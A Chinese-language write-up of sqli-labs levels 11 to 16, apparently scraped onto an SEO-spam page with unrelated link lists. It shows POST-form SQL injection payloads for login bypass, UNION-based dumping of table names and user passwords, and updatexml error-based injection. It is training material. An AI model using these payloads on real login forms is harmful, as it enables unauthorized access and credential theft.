当前位置: 首页 > wzjs >正文

网站建设周期舆情分析

网站建设周期,舆情分析,网络 企业网站,商城开发网站建设第11关 POST请求联合注入一、审题这一关开始变成了登录框输入,也就是post请求的表单提交。前十关都是get请求方式,可以直接在url栏中注入,这里的注入点换成了登录框。二、思考这里输入1会显示报错,可以判断出是单引号闭合。我们仔…

第11关 POST请求联合注入

一、审题

这一关开始变成了登录框输入,也就是post请求的表单提交。前十关都是get请求方式,可以直接在url栏中注入,这里的注入点换成了登录框。

二、思考

 这里输入1'会显示报错,可以判断出是单引号闭合。

我们仔细观察报错信息,MySQL 指出错误发生在查询的 '1'' and password='' LIMIT 0,1 部分附近,那么来推测一下原始的查询语句,可能是:

SELECT * FROM users WHERE username = '$uname' and password = '$passwd' LIMIT 0,1

假设在username框中输入1' or 1=1 #来尝试把后面的密码验证注释掉,看看是否能登录成功。

这里使用#注释符是因为post请求会完整传输,无需编码处理。

可以看到这里绕过密码,登录成功,页面显示了用户名和密码。

接下来尝试用联合注入获取更多数据。

三、做法

1.获取数据库名;

-1' union select 1,database()#

2.获取表名;

-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

3.获取字段名;

-1' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'#

4.获取字段数据。

-1' union select 1,group_concat(username,'~',password) from users#

第12关 ")闭合的联合注入

第13关  ')闭合的报错注入

这里登录成功没有回显位,但是登录失败会有报错信息。可以使用之前学过的报错注入。

-1') and updatexml(1,concat(0x7e,(select database())),3)#

第14关 双引号闭合的报错注入

第15关 单引号闭合的布尔盲注

只有正确和错误两种页面回显,可以使用布尔盲注。

第16关 ")闭合的布尔盲注

这几关都是通过POST请求的方式注入,把前面的联合注入,报错注入,布尔盲注又复习了一遍。

http://www.dtcms.com/wzjs/297190.html

相关文章:

  • wordpress建站案例视频百度广告位价格表
  • 陆丰网页设计如何做好网站站内优化
  • 网站做弹窗广告宁波受欢迎全网seo优化
  • 建设施工合同范本网站seo优化网站
  • 做电影网站怎么选服务器游戏推广渠道有哪些
  • 网站建设公司活动杭州免费网站制作
  • 2022二建价格疯涨咸阳seo
  • 易优建站网站seo推广方案
  • 淘宝数据网站开发旺道网站优化
  • 大型网站建设历史百度知道客服电话人工服务
  • 孕妇做兼职上哪家网站零基础学电脑培训班
  • 注册百度网站怎么弄凡科建站登录入口
  • 武汉网站推广公司招聘百度服务中心官网
  • 陕西高速公路建设集团公司网站广告公司推广方案
  • 网站开发的安全策略搜索引擎案例分析结论
  • 网站怎么收费的steam交易链接是什么
  • 社区论坛自助建站网免费crm客户管理系统
  • 成都手机网站建设百度seo规则
  • 专业建设验收网站锦绣大地seo官网
  • 徐州集团网站建设公司昆山网站建设推广
  • 宿松网站建设设计百度搜索网址
  • 福州制作网站设计哪里比较好企业培训体系
  • 网站建设制作合同模板百度识图搜索网页版
  • 老电脑做网站服务器免费技能培训网
  • wordpress播放页seo中介平台
  • 网络共享和数据传输事件百度问答优化
  • 昆明婚恋网站价格hao123文件在哪里
  • 网站主题及风格成都搜索优化排名公司
  • 天津网站制作谷歌浏览器 免费下载
  • wordpress全站网易云音乐播放网页制作工具